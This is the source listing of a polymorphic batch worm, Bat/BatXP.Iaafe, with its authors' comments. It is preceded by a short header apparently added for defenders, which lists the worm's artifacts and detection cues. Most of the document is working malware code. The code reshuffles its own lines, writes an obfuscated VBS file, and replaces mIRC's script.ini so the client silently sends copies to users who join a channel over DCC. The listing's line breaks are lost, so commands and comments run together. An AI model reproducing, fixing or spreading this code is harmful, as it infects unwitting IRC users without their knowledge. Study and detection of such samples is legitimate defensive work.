:: NOTE(review): analysis header for defenders. Only these comment lines are new; the listing below is unchanged.
:: What this is: the authors' annotated source of a self-copying batch worm that spreads through mIRC (see their info block below).
:: Layout caveat: this copy has lost its original line breaks, so commands and comments run together. Read it as a listing.
:: File artifacts visible in the code:
::   - poly.bat and irc.vbs are written to the current directory, and both are deleted in the final section.
::   - irc.vbs is run with cscript and creates script.ini in the mIRC directory with the overwrite flag set.
::   - poly.bat is copied to name.bat in the mIRC directory, which is chosen from a short fixed list of install paths on C:.
:: Behavioural cues: a batch file that writes a .vbs, launches cscript, and then replaces script.ini of an IRC client.
:: Network cue: the generated script.ini hooks channel-join events and offers the dropped copy to other users over DCC.
:: Polymorphism: whole lines are re-emitted with find, keyed on the author tag each line carries, in an order derived from the clock.
::   Line content is not altered, so constant strings (the payload message, the dropped file names) remain usable for matching.
:: Obfuscation: what the authors call encryption is keyword substitution through environment variables plus chr() concatenation
::   in the generated VBS. Literal keyword matching on the .bat can miss it; presumably the written script.ini holds the plain text.
:: Payload: the only payload visible here is a text message echoed when the generation counter reaches 5.
:: Variant count quoted below is 21 factorial, about 5.1e19; the word trillion is presumably long-scale usage.
set generation=0 @echo off % spth-phile % cls % spth-phile % % spth-phile %set /a generation=%generation%+1 % spth-phile %if %generation% EQU 5 ( % spth-phile %echo You are infect with philet0ast3r's and Second Part To Hell's Bat/BatXP.Iaafe! % spth-phile %set generation=0 % spth-phile %) % spth-phile %echo set generation=%generation% >poly.bat :: Bat/BatXP.Iaafe % spth-phile % :: by philet0ast3r[rRlf] & Second Part To Hell[rRlf] % spth-phile % :: % spth-phile % :: philet0ast3r: Virus idea, name idea and the genial random engine :D % spth-phile % :: Second Part To Hell: Included the virus part, encrypt the BAT/VBS part, BatXP workable (workable? +fg+), made this stuff polymporph and the comments % spth-phile % :: % spth-phile % :: Big thanks goes to Lord Yup for writting the the "Silend DCC SEND"-Article { You'll find it in 29A #6 } % spth-phile % :: ------------------------------------------------------------------------------------------------------------------------------------------ % spth-phile % :: General Virus Info: % spth-phile % :: % spth-phile % :: Name of the Virus................................. Bat/BatXP.Iaafe % spth-phile % :: Author............................................ philet0ast3r & Second Part To Hell % spth-phile % :: Size.............................................. 20.194 byte % spth-phile % :: Encrypt........................................... Most of the virus part and something of the random-engine % spth-phile % :: Polymorphism...................................... Yes % spth-phile % :: (possible variants under WinXP (21*20*19*18*17*16*15*14*13*12*11*10*9*8*7*6*5*4*3*2) = 51090942171709440000 = ca. 51 trillion :] ) % spth-phile % :: (possible variants under WinME/98/95 (5*4*3*2) =120 ... because command.com doesn't allow more sets) % spth-phile % :: Spreading......................................... The virus spreads via mIRC, but not the normal "one-line-mIRC-spreading" way, but % spth-phile % :: a much better one. 
The User won't know, that he's infect. % spth-phile % :: Payload........................................... Every 5th generation the virus shows a shourt text % spth-phile % :: % spth-phile % :: Last words by Second Part To Hell: % spth-phile % :: I nearly commited suicide while writing this virus ;), % spth-phile % :: because i had to fix more than 1.000.000 bugs in this fuckin' program. % spth-phile % :: But I'm sure, i fixed all and now the virus works without mistake. % spth-phile % :: % spth-phile % :: Last words by philet0ast3r: % spth-phile % :: I just want to thank/greet some important persons: % spth-phile % :: breathe for helping me getting the idea how a batch random # generator could work % spth-phile % :: 3ri5, kathi, ina, janine & phily for being real friends (and more ;) % spth-phile % :: Slage Hammer % spth-phile % :: alcopaul % spth-phile % :: the rest of the rRlf and some other ppl, who know me % spth-phile % :: % spth-phile % % spth-phile %set generation= % spth-phile %set qwxykjsi=set % spth-phile %set aaa=A %qwxykjsi% fi=if % spth-phile % %qwxykjsi% nt=not % spth-phile % %qwxykjsi% el=errorlevel % spth-phile % %qwxykjsi% ine=%fi% %nt% %el% % spth-phile % % spth-phile %set vrsa=rndom set oto=goto% spth-phile % %qwxykjsi% a=0 % spth-phile % set fd=find% spth-phile % :: This part makes the set's for the crypt BAT part %fd% "spth-phile"<%0>>poly.bat :: The virus searches for "spth-phile" in every line of itself an :: write this lines to the poly.bat file %qwxykjsi% xp=true% spth-phile % % spth-phile %if %xp% EQU true goto xptruea :: It's a BatXP command, if it's true, the virus goes to the BatXP part goto winparta % spth-phile % :: Else it goes to the Bat part :xptruea % spth-phile % % spth-phile %set a=0 % spth-phile %set b=0 % spth-phile %set c=0 % spth-phile %set d=0 % spth-phile %set e=0 % spth-phile %set f=0 % spth-phile %set g=0 % spth-phile %set h=0 % spth-phile %set i=0 % spth-phile %set j=0 % spth-phile %set k=0 % spth-phile %set l=0 % 
spth-phile %set m=0 % spth-phile %set n=0 % spth-phile %set o=0 % spth-phile %set p=0 % spth-phile %set q=0 % spth-phile %set r=0 % spth-phile %set s=0 % spth-phile %set t=0 % spth-phile %set u=0 :: This set's are for the poly engine, because the variables can't be nothing :: in an if-part :start0 % spth-phile % % spth-phile %set aa=0 :: aa, the main poly-engine variable is zero :start1 % spth-phile % if %aa% EQU 5 goto endpoly % spth-phile % %qwxykjsi% /a aa=%aa%+1 % spth-phile % :: aa is aa+1 :start2 % spth-phile % ver|time|%fd% ",1">nul % spth-phile % :: Searching after "1" in the current time %ine% 1 %qwxykjsi% %vrsa%%aa%=1% spth-phile % :: If there is no errorlevel, that means, if the searching number in the time :: is 1, the variable %vrsa%(random)%aa%(changes, but at first it's 1) is 1! %ine% 1 %oto% start1 % spth-phile % :: Goto start ver|time|%fd% ",2">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=2% spth-phile % %ine% 1 %oto% start1 % spth-phile % :: Ones more the same ver|time|%fd% ",3">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=3% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",4">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=4% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",5">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=5% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",6">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=6% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",7">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=7% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",8">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=8% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",9">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=9% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",0">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=10% spth-phile % %ine% 1 %oto% start1 % spth-phile % goto start2 % spth-phile % :endpoly % 
spth-phile % % spth-phile %if %a% NEQ 1 (if %rndom1% EQU 1 ( % spth-phile %find "%aaa%AAA" <%0 >>poly.bat % spth-phile %set a=1 % spth-phile %)) :: The last 4 lines are one if-part. :: If a <> 1 AND if %random1% (you know: %vrsa%%aa%) is 1 then seaching :: after "BBBB" in the whole code, and write it to poly.bat. And changing :: the "a" to 1! So this part of the code won't write ones more to the poly.bat % spth-phile %if %b% NEQ 1 (if %rndom1% EQU 2 ( % spth-phile %find "%aaa%BBB" <%0 >>poly.bat % spth-phile %set b=1 % spth-phile %)) :: The same % spth-phile %if %c% NEQ 1 (if %rndom1% EQU 3 ( % spth-phile %find "%aaa%CCC" <%0 >>poly.bat % spth-phile %set c=1 % spth-phile %)) % spth-phile %if %d% NEQ 1 (if %rndom1% EQU 4 ( % spth-phile %find "%aaa%DDD" <%0 >>poly.bat % spth-phile %set d=1 % spth-phile %)) % spth-phile %if %e% NEQ 1 (if %rndom2% EQU 1 ( % spth-phile %find "%aaa%EEE" <%0 >>poly.bat % spth-phile %set e=1 % spth-phile %)) % spth-phile %if %f% NEQ 1 (if %rndom2% EQU 2 ( % spth-phile %find "%aaa%FFF" <%0 >>poly.bat % spth-phile %set f=1 % spth-phile %)) % spth-phile %if %g% NEQ 1 (if %rndom2% EQU 3 ( % spth-phile %find "%aaa%GGG" <%0 >>poly.bat % spth-phile %set g=1 % spth-phile %)) % spth-phile %if %h% NEQ 1 (if %rndom2% EQU 4 ( % spth-phile %find "%aaa%HHH" <%0 >>poly.bat % spth-phile %set h=1 % spth-phile %)) % spth-phile %if %i% NEQ 1 (if %rndom3% EQU 1 ( % spth-phile %find "%aaa%III" <%0 >>poly.bat % spth-phile %set i=1 % spth-phile %)) % spth-phile %if %j% NEQ 1 (if %rndom3% EQU 2 ( % spth-phile %find "%aaa%JJJ" <%0 >>poly.bat % spth-phile %set j=1 % spth-phile %)) % spth-phile %if %k% NEQ 1 (if %rndom3% EQU 3 ( % spth-phile %find "%aaa%KKK" <%0 >>poly.bat % spth-phile %set k=1 % spth-phile %)) % spth-phile %if %l% NEQ 1 (if %rndom3% EQU 4 ( % spth-phile %find "%aaa%LLL" <%0 >>poly.bat % spth-phile %set l=1 % spth-phile %)) % spth-phile %if %m% NEQ 1 (if %rndom4% EQU 1 ( % spth-phile %find "%aaa%MMM" <%0 >>poly.bat % spth-phile %set m=1 % spth-phile 
%)) % spth-phile %if %n% NEQ 1 (if %rndom4% EQU 2 ( % spth-phile %find "%aaa%NNN" <%0 >>poly.bat % spth-phile %set n=1 % spth-phile %)) % spth-phile %if %o% NEQ 1 (if %rndom4% EQU 3 ( % spth-phile %find "%aaa%OOO" <%0 >>poly.bat % spth-phile %set o=1 % spth-phile %)) % spth-phile %if %p% NEQ 1 (if %rndom4% EQU 4 ( % spth-phile %find "%aaa%PPP" <%0 >>poly.bat % spth-phile %set p=1 % spth-phile %)) % spth-phile %if %q% NEQ 1 (if %rndom5% EQU 1 ( % spth-phile %find "%aaa%QQQ" <%0 >>poly.bat % spth-phile %set q=1 % spth-phile %)) % spth-phile %if %r% NEQ 1 (if %rndom5% EQU 2 ( % spth-phile %find "%aaa%RRR" <%0 >>poly.bat % spth-phile %set r=1 % spth-phile %)) % spth-phile %if %s% NEQ 1 (if %rndom5% EQU 3 ( % spth-phile %find "%aaa%SSS" <%0 >>poly.bat % spth-phile %set s=1 % spth-phile %)) % spth-phile %if %t% NEQ 1 (if %rndom5% EQU 4 ( % spth-phile %find "%aaa%TTT" <%0 >>poly.bat % spth-phile %set t=1 % spth-phile %)) % spth-phile %if %u% NEQ 1 (if %rndom5% EQU 5 ( % spth-phile %find "%aaa%UUU" <%0 >>poly.bat % spth-phile %set u=1 % spth-phile %)) % spth-phile %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 ( % spth-phile %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 ( % spth-phile %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 ( % spth-phile %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 ( % spth-phile %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 ( goto irca % spth-phile % % spth-phile %))))))))))))))))))))) :: The last 7 lines are one really gigant if-part :) :: If every letter from "a" to "u" is 1, then the file goes to the mIRC part. goto start0 % spth-phile % :: Else it goes to the start0 part (and searches ones more for random-numbers) :winparta % spth-phile % :: Here you can find the normal Bat. If the OS isn't WinXP/Win2000prof, :: the virus will start it's life here. 
set wina=0% spth-phile % set winb=0% spth-phile % set winc=0% spth-phile % set wind=0% spth-phile % set wine=0% spth-phile % set oto=% spth-phile % set qwxykjsi=% spth-phile % set nt=% spth-phile % set fi=% spth-phile % set el=% spth-phile % set ine=% spth-phile % :: These are some variables for cryption or for the poly-engine :startwin2 % spth-phile % % spth-phile %if not %wina%==1 goto polyengi % spth-phile %if not %winb%==1 goto polyengi % spth-phile %if not %winc%==1 goto polyengi % spth-phile %if not %wind%==1 goto polyengi % spth-phile %if not %wine%==1 goto polyengi :: These 5 lines are doing the same as the big 7-lines-if-part in the BatXP! goto winirc % spth-phile % :polyengi % spth-phile % ver|time|find ",1">nul % spth-phile % if not errorlevel 1 set randoma=1% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % :: You have to know these lines, because I explained it in the BatXP part ver|time|find ",2">nul % spth-phile % if not errorlevel 1 set randoma=2% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % ver|time|find ",3">nul % spth-phile % if not errorlevel 1 set randoma=3% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % ver|time|find ",4">nul % spth-phile % if not errorlevel 1 set randoma=4% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % ver|time|find ",5">nul % spth-phile % if not errorlevel 1 set randoma=5% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % goto startwin2 % spth-phile % :enpolywin % spth-phile % % spth-phile %if not %wina%==1 if %randoma%==1 goto enapolywin % spth-phile %if not %winb%==1 if %randoma%==2 goto enbpolywin % spth-phile %if not %winc%==1 if %randoma%==3 goto encpolywin % spth-phile %if not %wind%==1 if %randoma%==4 goto endpolywin % spth-phile %if not %wine%==1 if %randoma%==5 goto enepolywin :: If the variable "wina-e" isn't 1, then if the "randoma" is 1-5, :: the virus goes to an other part of the Bat-poly-engine goto startwin2 % spth-phile % 
:enapolywin % spth-phile % % spth-phile %find "%aaa%BBB"<%0>> poly.bat % spth-phile %find "%aaa%AAA"<%0>> poly.bat % spth-phile %find "%aaa%KKK"<%0>> poly.bat % spth-phile %find "%aaa%DDD"<%0>> poly.bat set wina=1% spth-phile % :: The virus writes every lines with "ABBB","AAAA","AKKK","ADDD" to the poly-file :: and changes the variable "wina" to 1 % spth-phile %goto startwin2 :enbpolywin % spth-phile % % spth-phile %find "%aaa%EEE"<%0>> poly.bat % spth-phile %find "%aaa%LLL"<%0>> poly.bat % spth-phile %find "%aaa%GGG"<%0>> poly.bat % spth-phile %find "%aaa%HHH"<%0>> poly.bat set winb=1% spth-phile % % spth-phile %goto startwin2 :encpolywin % spth-phile % % spth-phile %find "%aaa%III"<%0>> poly.bat % spth-phile %find "%aaa%JJJ"<%0>> poly.bat % spth-phile %find "%aaa%CCC"<%0>> poly.bat % spth-phile %find "%aaa%FFF"<%0>> poly.bat set winc=1% spth-phile % % spth-phile %goto startwin2 :endpolywin % spth-phile % % spth-phile %find "%aaa%NNN"<%0>> poly.bat % spth-phile %find "%aaa%MMM"<%0>> poly.bat % spth-phile %find "%aaa%PPP"<%0>> poly.bat % spth-phile %find "%aaa%OOO"<%0>> poly.bat set wind=1% spth-phile % % spth-phile %goto startwin2 :enepolywin % spth-phile % % spth-phile %find "%aaa%RRR"<%0>> poly.bat % spth-phile %find "%aaa%SSS"<%0>> poly.bat % spth-phile %find "%aaa%UUU"<%0>> poly.bat % spth-phile %find "%aaa%TTT"<%0>> poly.bat % spth-phile %find "%aaa%QQQ"<%0>> poly.bat set wine=1% spth-phile % % spth-phile %goto startwin2 :winirc % spth-phile % % spth-phile %set wina= % spth-phile %set winb= % spth-phile %set winc= % spth-phile %set wind= % spth-phile %set wine= % spth-phile %set aaa= % spth-phile %set randoma= :: All variables used in the poly-engine are deleted :irca % AAAA % if exist C:\mirc\script.ini set mir=C:\mirc% AAAA % echo %mir% if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA % if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA % if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA % goto ircb% AAAA % :ircb % 
ABBB % set mirc=%mir%\script.ini% ABBB % set vs=chr(% ABBB % goto ircc% ABBB % :ircc % ACCC % set wc=echo file.writeline% ACCC % goto ircd% ACCC % :ircd % ADDD % echo dim fso, file > irc.vbs% ADDD % echo set fso = createobject("scripting.filesystemobject") >>irc.vbs% ADDD % echo set file = fso.createtextfile ("%mir%\script.ini", true)>>irc.vbs% ADDD % goto irce% ADDD % :irce % AEEE % %wc% " on 1:st" + %vs%97) + "rt: { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "filee %mir%\name.b" + %vs%97) + "t }">>irc.vbs% AEEE % %wc% " on 1:join:#: { ">>irc.vbs% AEEE % %wc% " .if (" + %vs%36) + "nick != " + %vs%36) + "me " + %vs%38) + "" + %vs%38) + " " + %vs%37) + "old != " + %vs%36) + "nick) {">>irc.vbs% AEEE % goto ircf% AEEE % :ircf % AFFF % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "old " + %vs%36) + "nick">>irc.vbs% AFFF % %wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,100000) 1 5 ." + %vs%36) + "check_him( " + %vs%36) + "nick , " + %vs%36) + "ch" + %vs%97) + "n )">>irc.vbs% AFFF % goto ircg% AFFF % :ircg % AGGG % %wc% " } ">>irc.vbs% AGGG % %wc% " }">>irc.vbs% AGGG % %wc% " " + %vs%97) + "li" + %vs%97) + "s check_him {">>irc.vbs% AGGG % goto irch% AGGG % :irch % AHHH % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) ">>irc.vbs% AHHH % %wc% " .while (" + %vs%36) + "portfree(" + %vs%37) + "port) == " + %vs%36) + "f" + %vs%97) + "lse) { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) }">>irc.vbs% AHHH % goto irci% AHHH % :irci % AIII % %wc% " .%fi% (" + %vs%36) + "1 !isop " + %vs%36) + "2) { ">>irc.vbs% AIII % %wc% " .%nt%ice " + %vs%36) + "1 :DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " teletubies ( " + %vs%36) + "+ " + %vs%36) + "ip " + %vs%36) + "+ ) ">>irc.vbs% AIII % goto ircj% AIII % :ircj % AJJJ % %wc% " ." 
+ %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,99999)">>irc.vbs% AJJJ % %wc% " .msg " + %vs%36) + "1 DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " " + %vs%37) + "filee " + %vs%36) + "longip(" + %vs%36) + "ip) " + %vs%37) + "port " + %vs%36) + "file(" + %vs%37) + "filee).size " + %vs%36) + "+ ">>irc.vbs% AJJJ % %wc% " .socklisten " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%37) + "port">>irc.vbs% AJJJ % goto irck% AJJJ % :irck % AKKK % %wc% " .timers off">>irc.vbs% AKKK % %wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,99999) 0 10 .cloze">>irc.vbs% AKKK % %wc% " } ">>irc.vbs% AKKK % goto ircl% AKKK % :ircl % ALLL % %wc% " }">>irc.vbs% ALLL % %wc% " on 1:socklisten:" + %vs%37) + "sock_n" + %vs%97) + "me: {">>irc.vbs% ALLL % goto ircm% ALLL % :ircm % AMMM % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "client_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,9999999)">>irc.vbs% AMMM % %wc% " .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me">>irc.vbs% AMMM % goto ircn% AMMM % :ircn % ANNN % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "l 0">>irc.vbs% ANNN % %wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs % ANNN % goto irco% ANNN % :irco % AOOO % %wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% AOOO % %wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% AOOO % goto ircp% AOOO % :ircp % APPP % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 0">>irc.vbs% APPP % %wc% " }">>irc.vbs% APPP % %wc% " on 1:sockre" + %vs%97) + "d:" + %vs%37) + "client_n" + %vs%97) + "me: {">>irc.vbs% APPP % goto ircq % APPP % :ircq % AQQQ % %wc% " .%fi% (" + %vs%37) + "l >= " + %vs%36) + "file(" + %vs%37) + "filee).size) {">>irc.vbs% AQQQ % %wc% " ." 
+ %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 1">>irc.vbs% AQQQ % goto ircr% AQQQ % :ircr % ARRR % %wc% " .sockclose " + %vs%37) + "client_n" + %vs%97) + "me">>irc.vbs% ARRR % %wc% " .h" + %vs%97) + "lt">>irc.vbs% ARRR % %wc% " } .else {">>irc.vbs% ARRR % goto ircs% ARRR % :ircs % ASSS % %wc% " .%fi% (" + %vs%37) + "end != 1) {">>irc.vbs% ASSS % %wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs% ASSS % goto irct% ASSS % :irct % ATTT % %wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% ATTT % %wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% ATTT % %wc% " } } }">>irc.vbs% ATTT % goto ircu% ATTT % :ircu % AUUU % %wc% " " + %vs%97) + "li" + %vs%97) + "s cloze { .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me } ">>irc.vbs% AUUU % echo file.Close >>irc.vbs% AUUU % cscript irc.vbs% AUUU % cls% AUUU % goto eirc% AUUU % :: This is the whole virus part :: It spreads via mIRC, and is mostly encrypt :eirc % phile-spth % del irc.vbs % phile-spth % find "phile-spth"<%0>>poly.bat copy poly.bat %mir%\name.bat % phile-spth % del poly.bat % phile-spth % cls % phile-spth % :: Last but not least, the virus searchs for "phile-spth" in the viruscode, :: And write it to the poly.bat! Then it copies the poly.bat to the mIRC-dir :: and deletes the irc-vbs and the poly.bat!